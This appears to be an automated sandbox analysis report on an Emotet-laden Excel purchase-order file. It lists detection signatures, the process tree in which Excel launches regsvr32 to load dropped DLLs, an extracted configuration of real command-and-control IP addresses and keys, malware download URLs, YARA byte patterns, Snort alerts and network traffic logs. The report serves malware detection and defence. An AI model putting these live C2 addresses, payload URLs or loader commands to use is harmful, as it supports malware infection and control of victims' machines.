Edit tour

Windows Analysis Report
PO0000001552.xls

Overview

General Information

Sample Name:	PO0000001552.xls
Analysis ID:	745091
MD5:	ecdc3f1e9afd2ce212a12ba3a844f521
SHA1:	0121ba555dfe0b42834759d201cce505bd619f86
SHA256:	1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Office process drops PE file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Registers a DLL

Drops PE files to the user directory

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64_ra

EXCEL.EXE (PID: 4380 cmdline: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls MD5: 23CAD504B3E04BB54CD636AD2874041A)

regsvr32.exe (PID: 6588 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6676 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll" MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6756 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6792 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll" MD5: 578BAB56836A3FE455FFC7883041825B)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
PO0000001552.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x146aa:$s1: Excel 0x1573f:$s1: Excel 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x171c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2a90c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ac0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b568:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x216e4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2ae01:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ad4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x175c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2ad0c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ec0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b968:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x21ae4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2b201:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ed4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.regsvr32.exe.980000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.980000.0.unpack	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x169c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2a10c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x242c0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1ad68:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x20ee4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2a601:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x242d4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
8.2.regsvr32.exe.980000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.980000.0.raw.unpack	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x175c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2ad0c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ec0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b968:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x21ae4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2b201:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ed4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 9 - Source IP: 192.168.2.3 - Destination IP: 182.162.143.56

Timestamp:	192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953
SID:	2404316
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 18 - Source IP: 192.168.2.3 - Destination IP: 45.63.99.23

Timestamp:	192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965
SID:	2404334
Source Port:	49709
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.3 - Destination IP: 1.1.1.1

Timestamp:	192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666
SID:	2023883
Source Port:	63177
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET CNC Feodo Tracker Reported CnC Server TCP group 8 - Source IP: 192.168.2.3 - Destination IP: 173.255.211.88

Timestamp:	192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872
SID:	2404314
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PO0000001552.xls

Virustotal: Detection: 66%

Perma Link

Antivirus detection for URL or domain

Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	Avira URL Cloud: Label: malware
Source: http://ly.yjlianyi.top/wp-admin/4cChao/	Avira URL Cloud: Label: malware
Source: http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/tkafmhcgcid/	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: sbm.xinmoshiwang.com	Virustotal: Detection: 13%	Perma Link
Source: datie-tw.com	Virustotal: Detection: 10%	Perma Link
Source: copunupo.ac.zm	Virustotal: Detection: 17%	Perma Link
Source: ly.yjlianyi.top	Virustotal: Detection: 13%	Perma Link

Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}

Source: unknown	HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\2yXcjy57oZTTUNweDidCGUY[1].dll	Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Source: global traffic	DNS query: name: datie-tw.com
Source: global traffic	DNS query: name: sbm.xinmoshiwang.com
Source: global traffic	DNS query: name: copunupo.ac.zm
Source: global traffic	DNS query: name: ly.yjlianyi.top

Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
